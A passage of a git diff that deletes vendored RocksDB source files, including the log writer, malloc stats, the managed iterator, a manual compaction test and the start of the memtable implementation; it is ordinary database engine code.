-  if (t < kRecyclableFullType) {
-    // Legacy record format
-    assert(block_offset_ + kHeaderSize + n <= kBlockSize);
-    header_size = kHeaderSize;
-  } else {
-    // Recyclable record format
-    assert(block_offset_ + kRecyclableHeaderSize + n <= kBlockSize);
-    header_size = kRecyclableHeaderSize;
-
-    // Only encode low 32-bits of the 64-bit log number.  This means
-    // we will fail to detect an old record if we recycled a log from
-    // ~4 billion logs ago, but that is effectively impossible, and
-    // even if it were we'dbe far more likely to see a false positive
-    // on the 32-bit CRC.
-    EncodeFixed32(buf + 7, static_cast<uint32_t>(log_number_));
-    crc = crc32c::Extend(crc, buf + 7, 4);
-  }
-
-  // Compute the crc of the record type and the payload.
-  crc = crc32c::Extend(crc, ptr, n);
-  crc = crc32c::Mask(crc);  // Adjust for storage
-  EncodeFixed32(buf, crc);
-
-  // Write the header and the payload
-  Status s = dest_->Append(Slice(buf, header_size));
-  if (s.ok()) {
-    s = dest_->Append(Slice(ptr, n));
-    if (s.ok()) {
-      if (!manual_flush_) {
-        s = dest_->Flush();
-      }
-    }
-  }
-  block_offset_ += header_size + n;
-  return s;
-}
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_writer.h b/thirdparty/rocksdb/db/log_writer.h
deleted file mode 100644
index a3a8799..0000000
--- a/thirdparty/rocksdb/db/log_writer.h
+++ /dev/null
@@ -1,111 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-
-#include <memory>
-
-#include "db/log_format.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class WritableFileWriter;
-
-using std::unique_ptr;
-
-namespace log {
-
-/**
- * Writer is a general purpose log stream writer. It provides an append-only
- * abstraction for writing data. The details of the how the data is written is
- * handled by the WriteableFile sub-class implementation.
- *
- * File format:
- *
- * File is broken down into variable sized records. The format of each record
- * is described below.
- *       +-----+-------------+--+----+----------+------+-- ... ----+
- * File  | r0  |        r1   |P | r2 |    r3    |  r4  |           |
- *       +-----+-------------+--+----+----------+------+-- ... ----+
- *       <--- kBlockSize ------>|<-- kBlockSize ------>|
- *  rn = variable size records
- *  P = Padding
- *
- * Data is written out in kBlockSize chunks. If next record does not fit
- * into the space left, the leftover space will be padded with \0.
- *
- * Legacy record format:
- *
- * +---------+-----------+-----------+--- ... ---+
- * |CRC (4B) | Size (2B) | Type (1B) | Payload   |
- * +---------+-----------+-----------+--- ... ---+
- *
- * CRC = 32bit hash computed over the payload using CRC
- * Size = Length of the payload data
- * Type = Type of record
- *        (kZeroType, kFullType, kFirstType, kLastType, kMiddleType )
- *        The type is used to group a bunch of records together to represent
- *        blocks that are larger than kBlockSize
- * Payload = Byte stream as long as specified by the payload size
- *
- * Recyclable record format:
- *
- * +---------+-----------+-----------+----------------+--- ... ---+
- * |CRC (4B) | Size (2B) | Type (1B) | Log number (4B)| Payload   |
- * +---------+-----------+-----------+----------------+--- ... ---+
- *
- * Same as above, with the addition of
- * Log number = 32bit log file number, so that we can distinguish between
- * records written by the most recent log writer vs a previous one.
- */
-class Writer {
- public:
-  // Create a writer that will append data to "*dest".
-  // "*dest" must be initially empty.
-  // "*dest" must remain live while this Writer is in use.
-  explicit Writer(unique_ptr<WritableFileWriter>&& dest, uint64_t log_number,
-                  bool recycle_log_files, bool manual_flush = false);
-  ~Writer();
-
-  Status AddRecord(const Slice& slice);
-
-  WritableFileWriter* file() { return dest_.get(); }
-  const WritableFileWriter* file() const { return dest_.get(); }
-
-  uint64_t get_log_number() const { return log_number_; }
-
-  Status WriteBuffer();
-
- private:
-  unique_ptr<WritableFileWriter> dest_;
-  size_t block_offset_;       // Current offset in block
-  uint64_t log_number_;
-  bool recycle_log_files_;
-
-  // crc32c values for all supported record types.  These are
-  // pre-computed to reduce the overhead of computing the crc of the
-  // record type stored in the header.
-  uint32_t type_crc_[kMaxRecordType + 1];
-
-  Status EmitPhysicalRecord(RecordType type, const char* ptr, size_t length);
-
-  // If true, it does not flush after each write. Instead it relies on the upper
-  // layer to manually does the flush by calling ::WriteBuffer()
-  bool manual_flush_;
-
-  // No copying allowed
-  Writer(const Writer&);
-  void operator=(const Writer&);
-};
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/malloc_stats.cc b/thirdparty/rocksdb/db/malloc_stats.cc
deleted file mode 100644
index 7acca65..0000000
--- a/thirdparty/rocksdb/db/malloc_stats.cc
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/malloc_stats.h"
-
-#ifndef ROCKSDB_LITE
-#include <memory>
-#include <string.h>
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_JEMALLOC
-#include "jemalloc/jemalloc.h"
-
-typedef struct {
-  char* cur;
-  char* end;
-} MallocStatus;
-
-static void GetJemallocStatus(void* mstat_arg, const char* status) {
-  MallocStatus* mstat = reinterpret_cast<MallocStatus*>(mstat_arg);
-  size_t status_len = status ? strlen(status) : 0;
-  size_t buf_size = (size_t)(mstat->end - mstat->cur);
-  if (!status_len || status_len > buf_size) {
-    return;
-  }
-
-  snprintf(mstat->cur, buf_size, "%s", status);
-  mstat->cur += status_len;
-}
-#endif  // ROCKSDB_JEMALLOC
-
-void DumpMallocStats(std::string* stats) {
-#ifdef ROCKSDB_JEMALLOC
-  MallocStatus mstat;
-  const unsigned int kMallocStatusLen = 1000000;
-  std::unique_ptr<char[]> buf{new char[kMallocStatusLen + 1]};
-  mstat.cur = buf.get();
-  mstat.end = buf.get() + kMallocStatusLen;
-  je_malloc_stats_print(GetJemallocStatus, &mstat, "");
-  stats->append(buf.get());
-#endif  // ROCKSDB_JEMALLOC
-}
-
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/malloc_stats.h b/thirdparty/rocksdb/db/malloc_stats.h
deleted file mode 100644
index a2f324f..0000000
--- a/thirdparty/rocksdb/db/malloc_stats.h
+++ /dev/null
@@ -1,22 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-namespace rocksdb {
-
-void DumpMallocStats(std::string*);
-
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/managed_iterator.cc b/thirdparty/rocksdb/db/managed_iterator.cc
deleted file mode 100644
index c393eb5..0000000
--- a/thirdparty/rocksdb/db/managed_iterator.cc
+++ /dev/null
@@ -1,262 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/managed_iterator.h"
-
-#include <limits>
-#include <string>
-#include <utility>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "table/merging_iterator.h"
-
-namespace rocksdb {
-
-namespace {
-// Helper class that locks a mutex on construction and unlocks the mutex when
-// the destructor of the MutexLock object is invoked.
-//
-// Typical usage:
-//
-//   void MyClass::MyMethod() {
-//     MILock l(&mu_);       // mu_ is an instance variable
-//     ... some complex code, possibly with multiple return paths ...
-//   }
-
-class MILock {
- public:
-  explicit MILock(std::mutex* mu, ManagedIterator* mi) : mu_(mu), mi_(mi) {
-    this->mu_->lock();
-  }
-  ~MILock() {
-    this->mu_->unlock();
-  }
-  ManagedIterator* GetManagedIterator() { return mi_; }
-
- private:
-  std::mutex* const mu_;
-  ManagedIterator* mi_;
-  // No copying allowed
-  MILock(const MILock&) = delete;
-  void operator=(const MILock&) = delete;
-};
-}  // anonymous namespace
-
-//
-// Synchronization between modifiers, releasers, creators
-// If iterator operation, wait till (!in_use), set in_use, do op, reset in_use
-//  if modifying mutable_iter, atomically exchange in_use:
-//  return if in_use set / otherwise set in use,
-//  atomically replace new iter with old , reset in use
-//  The releaser is the new operation and it holds a lock for a very short time
-//  The existing non-const iterator operations are supposed to be single
-//  threaded and hold the lock for the duration of the operation
-//  The existing const iterator operations use the cached key/values
-//  and don't do any locking.
-ManagedIterator::ManagedIterator(DBImpl* db, const ReadOptions& read_options,
-                                 ColumnFamilyData* cfd)
-    : db_(db),
-      read_options_(read_options),
-      cfd_(cfd),
-      svnum_(cfd->GetSuperVersionNumber()),
-      mutable_iter_(nullptr),
-      valid_(false),
-      snapshot_created_(false),
-      release_supported_(true) {
-  read_options_.managed = false;
-  if ((!read_options_.tailing) && (read_options_.snapshot == nullptr)) {
-    assert(nullptr != (read_options_.snapshot = db_->GetSnapshot()));
-    snapshot_created_ = true;
-  }
-  cfh_.SetCFD(cfd);
-  mutable_iter_ = unique_ptr<Iterator>(db->NewIterator(read_options_, &cfh_));
-}
-
-ManagedIterator::~ManagedIterator() {
-  Lock();
-  if (snapshot_created_) {
-    db_->ReleaseSnapshot(read_options_.snapshot);
-    snapshot_created_ = false;
-    read_options_.snapshot = nullptr;
-  }
-  UnLock();
-}
-
-bool ManagedIterator::Valid() const { return valid_; }
-
-void ManagedIterator::SeekToLast() {
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    RebuildIterator();
-  }
-  assert(mutable_iter_ != nullptr);
-  mutable_iter_->SeekToLast();
-  if (mutable_iter_->status().ok()) {
-    UpdateCurrent();
-  }
-}
-
-void ManagedIterator::SeekToFirst() {
-  MILock l(&in_use_, this);
-  SeekInternal(Slice(), true);
-}
-
-void ManagedIterator::Seek(const Slice& user_key) {
-  MILock l(&in_use_, this);
-  SeekInternal(user_key, false);
-}
-
-void ManagedIterator::SeekForPrev(const Slice& user_key) {
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    RebuildIterator();
-  }
-  assert(mutable_iter_ != nullptr);
-  mutable_iter_->SeekForPrev(user_key);
-  UpdateCurrent();
-}
-
-void ManagedIterator::SeekInternal(const Slice& user_key, bool seek_to_first) {
-  if (NeedToRebuild()) {
-    RebuildIterator();
-  }
-  assert(mutable_iter_ != nullptr);
-  if (seek_to_first) {
-    mutable_iter_->SeekToFirst();
-  } else {
-    mutable_iter_->Seek(user_key);
-  }
-  UpdateCurrent();
-}
-
-void ManagedIterator::Prev() {
-  if (!valid_) {
-    status_ = Status::InvalidArgument("Iterator value invalid");
-    return;
-  }
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    std::string current_key = key().ToString();
-    Slice old_key(current_key);
-    RebuildIterator();
-    SeekInternal(old_key, false);
-    UpdateCurrent();
-    if (!valid_) {
-      return;
-    }
-    if (key().compare(old_key) != 0) {
-      valid_ = false;
-      status_ = Status::Incomplete("Cannot do Prev now");
-      return;
-    }
-  }
-  mutable_iter_->Prev();
-  if (mutable_iter_->status().ok()) {
-    UpdateCurrent();
-    status_ = Status::OK();
-  } else {
-    status_ = mutable_iter_->status();
-  }
-}
-
-void ManagedIterator::Next() {
-  if (!valid_) {
-    status_ = Status::InvalidArgument("Iterator value invalid");
-    return;
-  }
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    std::string current_key = key().ToString();
-    Slice old_key(current_key.data(), cached_key_.Size());
-    RebuildIterator();
-    SeekInternal(old_key, false);
-    UpdateCurrent();
-    if (!valid_) {
-      return;
-    }
-    if (key().compare(old_key) != 0) {
-      valid_ = false;
-      status_ = Status::Incomplete("Cannot do Next now");
-      return;
-    }
-  }
-  mutable_iter_->Next();
-  UpdateCurrent();
-}
-
-Slice ManagedIterator::key() const {
-  assert(valid_);
-  return cached_key_.GetUserKey();
-}
-
-Slice ManagedIterator::value() const {
-  assert(valid_);
-  return cached_value_.GetUserKey();
-}
-
-Status ManagedIterator::status() const { return status_; }
-
-void ManagedIterator::RebuildIterator() {
-  svnum_ = cfd_->GetSuperVersionNumber();
-  mutable_iter_ = unique_ptr<Iterator>(db_->NewIterator(read_options_, &cfh_));
-}
-
-void ManagedIterator::UpdateCurrent() {
-  assert(mutable_iter_ != nullptr);
-
-  valid_ = mutable_iter_->Valid();
-  if (!valid_) {
-    status_ = mutable_iter_->status();
-    return;
-  }
-
-  status_ = Status::OK();
-  cached_key_.SetUserKey(mutable_iter_->key());
-  cached_value_.SetUserKey(mutable_iter_->value());
-}
-
-void ManagedIterator::ReleaseIter(bool only_old) {
-  if ((mutable_iter_ == nullptr) || (!release_supported_)) {
-    return;
-  }
-  if (svnum_ != cfd_->GetSuperVersionNumber() || !only_old) {
-    if (!TryLock()) {  // Don't release iter if in use
-      return;
-    }
-    mutable_iter_ = nullptr;  // in_use for a very short time
-    UnLock();
-  }
-}
-
-bool ManagedIterator::NeedToRebuild() {
-  if ((mutable_iter_ == nullptr) || (status_.IsIncomplete()) ||
-      (!only_drop_old_ && (svnum_ != cfd_->GetSuperVersionNumber()))) {
-    return true;
-  }
-  return false;
-}
-
-void ManagedIterator::Lock() {
-  in_use_.lock();
-  return;
-}
-
-bool ManagedIterator::TryLock() { return in_use_.try_lock(); }
-
-void ManagedIterator::UnLock() {
-  in_use_.unlock();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/managed_iterator.h b/thirdparty/rocksdb/db/managed_iterator.h
deleted file mode 100644
index 8e962f7..0000000
--- a/thirdparty/rocksdb/db/managed_iterator.h
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <mutex>
-#include <queue>
-#include <string>
-#include <vector>
-
-#include "db/column_family.h"
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-class DBImpl;
-struct SuperVersion;
-class ColumnFamilyData;
-
-/**
- * ManagedIterator is a special type of iterator that supports freeing the
- * underlying iterator and still being able to access the current key/value
- * pair.  This is done by copying the key/value pair so that clients can
- * continue to access the data without getting a SIGSEGV.
- * The underlying iterator can be freed manually through the  call to
- * ReleaseIter or automatically (as needed on space pressure or age.)
- * The iterator is recreated using the saved original arguments.
- */
-class ManagedIterator : public Iterator {
- public:
-  ManagedIterator(DBImpl* db, const ReadOptions& read_options,
-                  ColumnFamilyData* cfd);
-  virtual ~ManagedIterator();
-
-  virtual void SeekToLast() override;
-  virtual void Prev() override;
-  virtual bool Valid() const override;
-  void SeekToFirst() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void Next() override;
-  virtual Slice key() const override;
-  virtual Slice value() const override;
-  virtual Status status() const override;
-  void ReleaseIter(bool only_old);
-  void SetDropOld(bool only_old) {
-    only_drop_old_ = read_options_.tailing || only_old;
-  }
-
- private:
-  void RebuildIterator();
-  void UpdateCurrent();
-  void SeekInternal(const Slice& user_key, bool seek_to_first);
-  bool NeedToRebuild();
-  void Lock();
-  bool TryLock();
-  void UnLock();
-  DBImpl* const db_;
-  ReadOptions read_options_;
-  ColumnFamilyData* const cfd_;
-  ColumnFamilyHandleInternal cfh_;
-
-  uint64_t svnum_;
-  std::unique_ptr<Iterator> mutable_iter_;
-  // internal iterator status
-  Status status_;
-  bool valid_;
-
-  IterKey cached_key_;
-  IterKey cached_value_;
-
-  bool only_drop_old_ = true;
-  bool snapshot_created_;
-  bool release_supported_;
-  std::mutex in_use_;  // is managed iterator in use
-};
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/manual_compaction_test.cc b/thirdparty/rocksdb/db/manual_compaction_test.cc
deleted file mode 100644
index 039b908..0000000
--- a/thirdparty/rocksdb/db/manual_compaction_test.cc
+++ /dev/null
@@ -1,155 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Test for issue 178: a manual compaction causes deleted data to reappear.
-#include <iostream>
-#include <sstream>
-#include <cstdlib>
-
-#include "rocksdb/db.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/write_batch.h"
-#include "util/testharness.h"
-#include "port/port.h"
-
-using namespace rocksdb;
-
-namespace {
-
-const int kNumKeys = 1100000;
-
-std::string Key1(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "my_key_%d", i);
-  return buf;
-}
-
-std::string Key2(int i) {
-  return Key1(i) + "_xxx";
-}
-
-class ManualCompactionTest : public testing::Test {
- public:
-  ManualCompactionTest() {
-    // Get rid of any state from an old run.
-    dbname_ = rocksdb::test::TmpDir() + "/rocksdb_cbug_test";
-    DestroyDB(dbname_, rocksdb::Options());
-  }
-
-  std::string dbname_;
-};
-
-class DestroyAllCompactionFilter : public CompactionFilter {
- public:
-  DestroyAllCompactionFilter() {}
-
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    return existing_value.ToString() == "destroy";
-  }
-
-  virtual const char* Name() const override {
-    return "DestroyAllCompactionFilter";
-  }
-};
-
-TEST_F(ManualCompactionTest, CompactTouchesAllKeys) {
-  for (int iter = 0; iter < 2; ++iter) {
-    DB* db;
-    Options options;
-    if (iter == 0) { // level compaction
-      options.num_levels = 3;
-      options.compaction_style = kCompactionStyleLevel;
-    } else { // universal compaction
-      options.compaction_style = kCompactionStyleUniversal;
-    }
-    options.create_if_missing = true;
-    options.compression = rocksdb::kNoCompression;
-    options.compaction_filter = new DestroyAllCompactionFilter();
-    ASSERT_OK(DB::Open(options, dbname_, &db));
-
-    db->Put(WriteOptions(), Slice("key1"), Slice("destroy"));
-    db->Put(WriteOptions(), Slice("key2"), Slice("destroy"));
-    db->Put(WriteOptions(), Slice("key3"), Slice("value3"));
-    db->Put(WriteOptions(), Slice("key4"), Slice("destroy"));
-
-    Slice key4("key4");
-    db->CompactRange(CompactRangeOptions(), nullptr, &key4);
-    Iterator* itr = db->NewIterator(ReadOptions());
-    itr->SeekToFirst();
-    ASSERT_TRUE(itr->Valid());
-    ASSERT_EQ("key3", itr->key().ToString());
-    itr->Next();
-    ASSERT_TRUE(!itr->Valid());
-    delete itr;
-
-    delete options.compaction_filter;
-    delete db;
-    DestroyDB(dbname_, options);
-  }
-}
-
-TEST_F(ManualCompactionTest, Test) {
-  // Open database.  Disable compression since it affects the creation
-  // of layers and the code below is trying to test against a very
-  // specific scenario.
-  rocksdb::DB* db;
-  rocksdb::Options db_options;
-  db_options.create_if_missing = true;
-  db_options.compression = rocksdb::kNoCompression;
-  ASSERT_OK(rocksdb::DB::Open(db_options, dbname_, &db));
-
-  // create first key range
-  rocksdb::WriteBatch batch;
-  for (int i = 0; i < kNumKeys; i++) {
-    batch.Put(Key1(i), "value for range 1 key");
-  }
-  ASSERT_OK(db->Write(rocksdb::WriteOptions(), &batch));
-
-  // create second key range
-  batch.Clear();
-  for (int i = 0; i < kNumKeys; i++) {
-    batch.Put(Key2(i), "value for range 2 key");
-  }
-  ASSERT_OK(db->Write(rocksdb::WriteOptions(), &batch));
-
-  // delete second key range
-  batch.Clear();
-  for (int i = 0; i < kNumKeys; i++) {
-    batch.Delete(Key2(i));
-  }
-  ASSERT_OK(db->Write(rocksdb::WriteOptions(), &batch));
-
-  // compact database
-  std::string start_key = Key1(0);
-  std::string end_key = Key1(kNumKeys - 1);
-  rocksdb::Slice least(start_key.data(), start_key.size());
-  rocksdb::Slice greatest(end_key.data(), end_key.size());
-
-  // commenting out the line below causes the example to work correctly
-  db->CompactRange(CompactRangeOptions(), &least, &greatest);
-
-  // count the keys
-  rocksdb::Iterator* iter = db->NewIterator(rocksdb::ReadOptions());
-  int num_keys = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    num_keys++;
-  }
-  delete iter;
-  ASSERT_EQ(kNumKeys, num_keys) << "Bad number of keys";
-
-  // close database
-  delete db;
-  DestroyDB(dbname_, rocksdb::Options());
-}
-
-}  // anonymous namespace
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/memtable.cc b/thirdparty/rocksdb/db/memtable.cc
deleted file mode 100644
index d51b261..0000000
--- a/thirdparty/rocksdb/db/memtable.cc
+++ /dev/null
@@ -1,925 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/memtable.h"
-
-#include <algorithm>
-#include <limits>
-#include <memory>
-
-#include "db/dbformat.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/internal_iterator.h"
-#include "table/iterator_wrapper.h"
-#include "table/merging_iterator.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-#include "util/coding.h"
-#include "util/memory_usage.h"
-#include "util/murmurhash.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-ImmutableMemTableOptions::ImmutableMemTableOptions(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options)
-    : arena_block_size(mutable_cf_options.arena_block_size),
-      memtable_prefix_bloom_bits(
-          static_cast<uint32_t>(
-              static_cast<double>(mutable_cf_options.write_buffer_size) *
-              mutable_cf_options.memtable_prefix_bloom_size_ratio) *
-          8u),
-      memtable_huge_page_size(mutable_cf_options.memtable_huge_page_size),
-      inplace_update_support(ioptions.inplace_update_support),
-      inplace_update_num_locks(mutable_cf_options.inplace_update_num_locks),
-      inplace_callback(ioptions.inplace_callback),
-      max_successive_merges(mutable_cf_options.max_successive_merges),
-      statistics(ioptions.statistics),
-      merge_operator(ioptions.merge_operator),
-      info_log(ioptions.info_log) {}
-
-MemTable::MemTable(const InternalKeyComparator& cmp,
-                   const ImmutableCFOptions& ioptions,
-                   const MutableCFOptions& mutable_cf_options,
-                   WriteBufferManager* write_buffer_manager,
-                   SequenceNumber latest_seq, uint32_t column_family_id)
-    : comparator_(cmp),
-      moptions_(ioptions, mutable_cf_options),
-      refs_(0),
-      kArenaBlockSize(OptimizeBlockSize(moptions_.arena_block_size)),
-      mem_tracker_(write_buffer_manager),
-      arena_(
-          moptions_.arena_block_size,
-          (write_buffer_manager != nullptr && write_buffer_manager->enabled())
-              ? &mem_tracker_
-              : nullptr,
-          mutable_cf_options.memtable_huge_page_size),
-      table_(ioptions.memtable_factory->CreateMemTableRep(
-          comparator_, &arena_, ioptions.prefix_extractor, ioptions.info_log,
-          column_family_id)),
-      range_del_table_(SkipListFactory().CreateMemTableRep(
-          comparator_, &arena_, nullptr /* transform */, ioptions.info_log,
-          column_family_id)),
-      is_range_del_table_empty_(true),
-      data_size_(0),
-      num_entries_(0),
-      num_deletes_(0),
-      write_buffer_size_(mutable_cf_options.write_buffer_size),
-      flush_in_progress_(false),
-      flush_completed_(false),
-      file_number_(0),
-      first_seqno_(0),
-      earliest_seqno_(latest_seq),
-      creation_seq_(latest_seq),
-      mem_next_logfile_number_(0),
-      min_prep_log_referenced_(0),
-      locks_(moptions_.inplace_update_support
-                 ? moptions_.inplace_update_num_locks
-                 : 0),
-      prefix_extractor_(ioptions.prefix_extractor),
-      flush_state_(FLUSH_NOT_REQUESTED),
-      env_(ioptions.env),
-      insert_with_hint_prefix_extractor_(
-          ioptions.memtable_insert_with_hint_prefix_extractor),
-      oldest_key_time_(std::numeric_limits<uint64_t>::max()) {
-  UpdateFlushState();
-  // something went wrong if we need to flush before inserting anything
-  assert(!ShouldScheduleFlush());
-
-  if (prefix_extractor_ && moptions_.memtable_prefix_bloom_bits > 0) {
-    prefix_bloom_.reset(new DynamicBloom(
-        &arena_, moptions_.memtable_prefix_bloom_bits, ioptions.bloom_locality,
-        6 /* hard coded 6 probes */, nullptr, moptions_.memtable_huge_page_size,
-        ioptions.info_log));
-  }
-}
-
-MemTable::~MemTable() {
-  mem_tracker_.FreeMem();
-  assert(refs_ == 0);
-}
-
-size_t MemTable::ApproximateMemoryUsage() {
-  autovector<size_t> usages = {arena_.ApproximateMemoryUsage(),
-                               table_->ApproximateMemoryUsage(),
-                               range_del_table_->ApproximateMemoryUsage(),
-                               rocksdb::ApproximateMemoryUsage(insert_hints_)};
-  size_t total_usage = 0;
-  for (size_t usage : usages) {
-    // If usage + total_usage >= kMaxSizet, return kMaxSizet.
-    // the following variation is to avoid numeric overflow.
-    if (usage >= port::kMaxSizet - total_usage) {
-      return port::kMaxSizet;
-    }
-    total_usage += usage;
-  }
-  // otherwise, return the actual usage
-  return total_usage;
-}
-
-bool MemTable::ShouldFlushNow() const {
-  size_t write_buffer_size = write_buffer_size_.load(std::memory_order_relaxed);
-  // In a lot of times, we cannot allocate arena blocks that exactly matches the
-  // buffer size. Thus we have to decide if we should over-allocate or
-  // under-allocate.
-  // This constant variable can be interpreted as: if we still have more than
-  // "kAllowOverAllocationRatio * kArenaBlockSize" space left, we'd try to over
-  // allocate one more block.
-  const double kAllowOverAllocationRatio = 0.6;
-
-  // If arena still have room for new block allocation, we can safely say it
-  // shouldn't flush.
-  auto allocated_memory = table_->ApproximateMemoryUsage() +
-                          range_del_table_->ApproximateMemoryUsage() +
-                          arena_.MemoryAllocatedBytes();
-
-  // if we can still allocate one more block without exceeding the
-  // over-allocation ratio, then we should not flush.
-  if (allocated_memory + kArenaBlockSize <
-      write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) {
-    return false;
-  }
-
-  // if user keeps adding entries that exceeds write_buffer_size, we need to
-  // flush earlier even though we still have much available memory left.
-  if (allocated_memory >
-      write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) {
-    return true;
-  }
-
-  // In this code path, Arena has already allocated its "last block", which
-  // means the total allocatedmemory size is either:
-  //  (1) "moderately" over allocated the memory (no more than `0.6 * arena
-  // block size`. Or,
-  //  (2) the allocated memory is less than write buffer size, but we'll stop
-  // here since if we allocate a new arena block, we'll over allocate too much
-  // more (half of the arena block size) memory.
-  //
-  // In either case, to avoid over-allocate, the last block will stop allocation
-  // when its usage reaches a certain ratio, which we carefully choose "0.75
-  // full" as the stop condition because it addresses the following issue with
-  // great simplicity: What if the next inserted entry's size is
-  // bigger than AllocatedAndUnused()?
-  //
-  // The answer is: if the entry size is also bigger than 0.25 *
-  // kArenaBlockSize, a dedicated block will be allocated for it; otherwise
-  // arena will anyway skip the AllocatedAndUnused() and allocate a new, empty
-  // and regular block. In either case, we *overly* over-allocated.
-  //
-  // Therefore, setting the last block to be at most "0.75 full" avoids both
-  // cases.
-  //
-  // NOTE: the average percentage of waste space of this approach can be counted
-  // as: "arena block size * 0.25 / write buffer size". User who specify a small
-  // write buffer size and/or big arena block size may suffer.
-  return arena_.AllocatedAndUnused() < kArenaBlockSize / 4;
-}
-
-void MemTable::UpdateFlushState() {
-  auto state = flush_state_.load(std::memory_order_relaxed);
-  if (state == FLUSH_NOT_REQUESTED && ShouldFlushNow()) {
-    // ignore CAS failure, because that means somebody else requested
-    // a flush
-    flush_state_.compare_exchange_strong(state, FLUSH_REQUESTED,
-                                         std::memory_order_relaxed,
-                                         std::memory_order_relaxed);
-  }
-}
-
-void MemTable::UpdateOldestKeyTime() {
-  uint64_t oldest_key_time = oldest_key_time_.load(std::memory_order_relaxed);
-  if (oldest_key_time == std::numeric_limits<uint64_t>::max()) {
-    int64_t current_time = 0;
-    auto s = env_->GetCurrentTime(&current_time);
-    if (s.ok()) {
-      assert(current_time >= 0);
-      // If fail, the timestamp is already set.
-      oldest_key_time_.compare_exchange_strong(
-          oldest_key_time, static_cast<uint64_t>(current_time),
-          std::memory_order_relaxed, std::memory_order_relaxed);
-    }
-  }
-}
-
-int MemTable::KeyComparator::operator()(const char* prefix_len_key1,
-                                        const char* prefix_len_key2) const {
